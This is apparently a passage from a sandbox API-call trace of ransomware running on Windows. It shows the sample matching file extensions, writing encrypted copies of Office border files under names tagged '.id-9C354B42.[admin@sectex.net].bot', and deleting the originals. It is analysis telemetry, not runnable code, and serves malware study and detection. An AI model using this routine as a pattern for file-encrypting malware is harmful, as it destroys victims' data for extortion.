	[0156.389] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString=".xls") returned 4
	[0156.389] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString=".xlsx") returned 5
	[0156.389] lstrcmpiW (lpString1=".xlsx", lpString2="0.BDR") returned -1
	[0156.389] lstrlenW (lpString=".ppt") returned 4
	[0156.389] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.390] lstrlenW (lpString=".zip") returned 4
	[0156.390] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.390] lstrlenW (lpString=".rar") returned 4
	[0156.390] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.390] lstrlenW (lpString=".bz2") returned 4
	[0156.390] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.390] lstrlenW (lpString=".7z") returned 3
	[0156.390] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.390] lstrlenW (lpString=".dbf") returned 4
	[0156.390] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.390] lstrlenW (lpString=".1cd") returned 4
	[0156.390] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART10.BDR") returned 62
	[0156.390] lstrlenW (lpString=".jpg") returned 4
	[0156.390] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.390] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.390] lstrlenW (lpString="MSART12.BDR") returned 11
	[0156.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.391] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=58756) returned 1
	[0156.391] CloseHandle (hObject=0x3d4) returned 1
	[0156.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr")) returned 0x20
	[0156.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.391] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.392] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.394] GetLastError () returned 0x0
	[0156.394] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xe584, lpOverlapped=0x0) returned 1
	[0156.397] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe590, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe590, lpOverlapped=0x0) returned 1
	[0156.399] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.399] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0156.399] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.399] CloseHandle (hObject=0x3b0) returned 1
	[0156.399] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.399] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.402] CloseHandle (hObject=0x3d4) returned 1
	[0156.402] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.402] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart12.bdr")) returned 1
	[0156.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.405] lstrlenW (lpString=".doc") returned 4
	[0156.405] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.405] lstrlenW (lpString=".docx") returned 5
	[0156.405] lstrcmpiW (lpString1=".docx", lpString2="2.BDR") returned -1
	[0156.405] lstrlenW (lpString=".pdf") returned 4
	[0156.405] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.405] lstrlenW (lpString=".xls") returned 4
	[0156.405] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.405] lstrlenW (lpString=".xlsx") returned 5
	[0156.405] lstrcmpiW (lpString1=".xlsx", lpString2="2.BDR") returned -1
	[0156.405] lstrlenW (lpString=".ppt") returned 4
	[0156.405] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.405] lstrlenW (lpString=".zip") returned 4
	[0156.406] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.406] lstrlenW (lpString=".rar") returned 4
	[0156.406] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.406] lstrlenW (lpString=".bz2") returned 4
	[0156.406] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.406] lstrlenW (lpString=".7z") returned 3
	[0156.406] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.406] lstrlenW (lpString=".dbf") returned 4
	[0156.406] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.406] lstrlenW (lpString=".1cd") returned 4
	[0156.406] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.406] lstrlenW (lpString=".jpg") returned 4
	[0156.406] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.406] lstrlenW (lpString=".doc") returned 4
	[0156.406] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.406] lstrlenW (lpString=".docx") returned 5
	[0156.406] lstrcmpiW (lpString1=".docx", lpString2="2.BDR") returned -1
	[0156.406] lstrlenW (lpString=".pdf") returned 4
	[0156.406] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.406] lstrlenW (lpString=".xls") returned 4
	[0156.406] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.406] lstrlenW (lpString=".xlsx") returned 5
	[0156.406] lstrcmpiW (lpString1=".xlsx", lpString2="2.BDR") returned -1
	[0156.406] lstrlenW (lpString=".ppt") returned 4
	[0156.406] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.407] lstrlenW (lpString=".zip") returned 4
	[0156.407] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.407] lstrlenW (lpString=".rar") returned 4
	[0156.407] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.407] lstrlenW (lpString=".bz2") returned 4
	[0156.407] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.407] lstrlenW (lpString=".7z") returned 3
	[0156.407] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.407] lstrlenW (lpString=".dbf") returned 4
	[0156.407] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.407] lstrlenW (lpString=".1cd") returned 4
	[0156.407] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART12.BDR") returned 62
	[0156.407] lstrlenW (lpString=".jpg") returned 4
	[0156.407] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.407] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.407] lstrlenW (lpString="MSART13.BDR") returned 11
	[0156.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.408] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=28368) returned 1
	[0156.408] CloseHandle (hObject=0x3d4) returned 1
	[0156.408] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr")) returned 0x20
	[0156.408] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.408] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.408] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.409] GetLastError () returned 0x0
	[0156.409] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x6ed0, lpOverlapped=0x0) returned 1
	[0156.528] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x6ee0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x6ee0, lpOverlapped=0x0) returned 1
	[0156.529] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.529] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0156.529] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.530] CloseHandle (hObject=0x3b0) returned 1
	[0156.530] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.530] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.532] CloseHandle (hObject=0x3d4) returned 1
	[0156.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.583] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart13.bdr")) returned 1
	[0156.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.584] lstrlenW (lpString=".doc") returned 4
	[0156.584] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.584] lstrlenW (lpString=".docx") returned 5
	[0156.584] lstrcmpiW (lpString1=".docx", lpString2="3.BDR") returned -1
	[0156.584] lstrlenW (lpString=".pdf") returned 4
	[0156.584] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.584] lstrlenW (lpString=".xls") returned 4
	[0156.584] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.584] lstrlenW (lpString=".xlsx") returned 5
	[0156.584] lstrcmpiW (lpString1=".xlsx", lpString2="3.BDR") returned -1
	[0156.584] lstrlenW (lpString=".ppt") returned 4
	[0156.584] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.584] lstrlenW (lpString=".zip") returned 4
	[0156.584] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.584] lstrlenW (lpString=".rar") returned 4
	[0156.584] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.584] lstrlenW (lpString=".bz2") returned 4
	[0156.584] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.584] lstrlenW (lpString=".7z") returned 3
	[0156.585] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.585] lstrlenW (lpString=".dbf") returned 4
	[0156.585] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.585] lstrlenW (lpString=".1cd") returned 4
	[0156.585] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.585] lstrlenW (lpString=".jpg") returned 4
	[0156.585] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.585] lstrlenW (lpString=".doc") returned 4
	[0156.585] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.585] lstrlenW (lpString=".docx") returned 5
	[0156.585] lstrcmpiW (lpString1=".docx", lpString2="3.BDR") returned -1
	[0156.585] lstrlenW (lpString=".pdf") returned 4
	[0156.585] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.585] lstrlenW (lpString=".xls") returned 4
	[0156.585] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.585] lstrlenW (lpString=".xlsx") returned 5
	[0156.585] lstrcmpiW (lpString1=".xlsx", lpString2="3.BDR") returned -1
	[0156.585] lstrlenW (lpString=".ppt") returned 4
	[0156.585] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.585] lstrlenW (lpString=".zip") returned 4
	[0156.585] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.585] lstrlenW (lpString=".rar") returned 4
	[0156.585] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.585] lstrlenW (lpString=".bz2") returned 4
	[0156.586] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.586] lstrlenW (lpString=".7z") returned 3
	[0156.586] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.586] lstrlenW (lpString=".dbf") returned 4
	[0156.586] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.586] lstrlenW (lpString=".1cd") returned 4
	[0156.586] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART13.BDR") returned 62
	[0156.586] lstrlenW (lpString=".jpg") returned 4
	[0156.586] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.586] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.586] lstrlenW (lpString="MSART5.BDR") returned 10
	[0156.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.589] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=15788) returned 1
	[0156.589] CloseHandle (hObject=0x3d4) returned 1
	[0156.589] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr")) returned 0x20
	[0156.589] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.590] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.590] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.590] GetLastError () returned 0x0
	[0156.590] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x3dac, lpOverlapped=0x0) returned 1
	[0156.592] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x3db0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x3db0, lpOverlapped=0x0) returned 1
	[0156.593] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.593] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.593] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.593] CloseHandle (hObject=0x3b0) returned 1
	[0156.593] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.593] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.595] CloseHandle (hObject=0x3d4) returned 1
	[0156.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.596] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart5.bdr")) returned 1
	[0156.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.597] lstrlenW (lpString=".doc") returned 4
	[0156.597] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.597] lstrlenW (lpString=".docx") returned 5
	[0156.597] lstrcmpiW (lpString1=".docx", lpString2="5.BDR") returned -1
	[0156.597] lstrlenW (lpString=".pdf") returned 4
	[0156.597] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.597] lstrlenW (lpString=".xls") returned 4
	[0156.597] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.597] lstrlenW (lpString=".xlsx") returned 5
	[0156.597] lstrcmpiW (lpString1=".xlsx", lpString2="5.BDR") returned -1
	[0156.597] lstrlenW (lpString=".ppt") returned 4
	[0156.597] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.597] lstrlenW (lpString=".zip") returned 4
	[0156.597] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.597] lstrlenW (lpString=".rar") returned 4
	[0156.597] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.597] lstrlenW (lpString=".bz2") returned 4
	[0156.597] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.597] lstrlenW (lpString=".7z") returned 3
	[0156.597] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.597] lstrlenW (lpString=".dbf") returned 4
	[0156.597] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.597] lstrlenW (lpString=".1cd") returned 4
	[0156.597] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.597] lstrlenW (lpString=".jpg") returned 4
	[0156.598] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.598] lstrlenW (lpString=".doc") returned 4
	[0156.598] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.598] lstrlenW (lpString=".docx") returned 5
	[0156.598] lstrcmpiW (lpString1=".docx", lpString2="5.BDR") returned -1
	[0156.598] lstrlenW (lpString=".pdf") returned 4
	[0156.598] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.598] lstrlenW (lpString=".xls") returned 4
	[0156.598] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.598] lstrlenW (lpString=".xlsx") returned 5
	[0156.598] lstrcmpiW (lpString1=".xlsx", lpString2="5.BDR") returned -1
	[0156.598] lstrlenW (lpString=".ppt") returned 4
	[0156.598] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.598] lstrlenW (lpString=".zip") returned 4
	[0156.598] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.598] lstrlenW (lpString=".rar") returned 4
	[0156.598] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
